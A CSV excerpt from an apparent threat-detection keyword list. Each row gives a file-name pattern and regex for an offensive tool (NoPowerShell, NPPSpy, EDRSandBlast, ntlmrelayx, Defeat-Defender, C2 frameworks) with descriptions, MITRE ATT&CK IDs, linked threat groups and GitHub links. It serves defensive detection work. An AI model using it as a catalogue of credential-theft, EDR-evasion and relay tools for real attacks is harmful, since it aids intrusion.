"*\NoPowerShell.*",".{0,1000}\\NoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","16953"
"*\No-PowerShell.cs*",".{0,1000}\\No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16954"
"*\NoPowerShell.exe*",".{0,1000}\\NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16955"
"*\NoPowerShell.exe*",".{0,1000}\\NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","NoPowerShell","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16956"
"*\NoPowerShell.exe*",".{0,1000}\\NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16957"
"*\No-PowerShell.exe*",".{0,1000}\\No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16958"
"*\norton\getCredsnorton.h*",".{0,1000}\\norton\\getCredsnorton\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16959"
"*\norton\getCredsnorton2.h*",".{0,1000}\\norton\\getCredsnorton2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16960"
"*\notavirus.exe*",".{0,1000}\\notavirus\.exe.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","16961"
"*\NovaLdr.exe",".{0,1000}\\NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","16962"
"*\NoveLdr.exe",".{0,1000}\\NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","16964"
"*\npc.exe ?-server=*",".{0,1000}\\npc\.exe\s?\-server\=.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16965"
"*\npc.exe start*",".{0,1000}\\npc\.exe\sstart.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16966"
"*\NPPSpy.c*",".{0,1000}\\NPPSpy\.c.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16967"
"*\NPPSPY.dll*",".{0,1000}\\NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16968"
"*\NPPSpy.exe*",".{0,1000}\\NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16969"
"*\NPPSpy.txt*",".{0,1000}\\NPPSpy\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16970"
"*\nps.exe install*",".{0,1000}\\nps\.exe\sinstall.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16971"
"*\nps.exe start*",".{0,1000}\\nps\.exe\sstart.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16972"
"*\nReversed shellcode:\n*",".{0,1000}\\nReversed\sshellcode\:\\n.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","16973"
"*-\nSharp RDP Hijack\n-*",".{0,1000}\-\\nSharp\sRDP\sHijack\\n\-.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","16974"
"*\nsocks.dll*",".{0,1000}\\nsocks\.dll.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","16975"
"*\nsocks.exe*",".{0,1000}\\nsocks\.exe.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","16976"
"*\NSudo.bat*",".{0,1000}\\NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16979"
"*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16980"
"*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16981"
"*\NSudoC.exe*",".{0,1000}\\NSudoC\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16982"
"*\NSudoG.exe*",".{0,1000}\\NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16983"
"*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16984"
"*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16985"
"*\ntdlll-unhooking-collection*",".{0,1000}\\ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","16986"
"*\ntdlol.txt*",".{0,1000}\\ntdlol\.txt.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","16987"
"*\ntdsuseraccount.py*",".{0,1000}\\ntdsuseraccount\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","16988"
"*\ntdsutil.py*",".{0,1000}\\ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16989"
"*\ntfs-read.py*",".{0,1000}\\ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16990"
"*\NTHASH-FPC\*",".{0,1000}\\NTHASH\-FPC\\.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","16991"
"*\ntlm.py*",".{0,1000}\\ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16992"
"*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","16993"
"*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","16994"
"*\NTLMRelay2Self*",".{0,1000}\\NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","16995"
"*\NtlmRelayToEWS\*",".{0,1000}\\NtlmRelayToEWS\\.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","16996"
"*\ntlmrelayx.exe*",".{0,1000}\\ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16997"
"*\ntlmrelayx.exe*",".{0,1000}\\ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16998"
"*\ntlmrelayx.py*",".{0,1000}\\ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16999"
"*\ntlmrelayx.py*",".{0,1000}\\ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","0","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","17000"
"*\NtlmThief\*",".{0,1000}\\NtlmThief\\.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","17001"
"*\ntlmutil.py*",".{0,1000}\\ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","17002"
"*\ntlmv1.py*",".{0,1000}\\ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17003"
"*\NtoskrnlOffsets.csv*",".{0,1000}\\NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","17004"
"*\NtRemoteLoad.exe*",".{0,1000}\\NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","17005"
"*\NtRemoteLoad.sln*",".{0,1000}\\NtRemoteLoad\.sln.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","17006"
"*\NtRights\*",".{0,1000}\\NtRights\\.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","0","N/A","N/A","7","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","17007"
"*\Nuages_Cli*",".{0,1000}\\Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","17008"
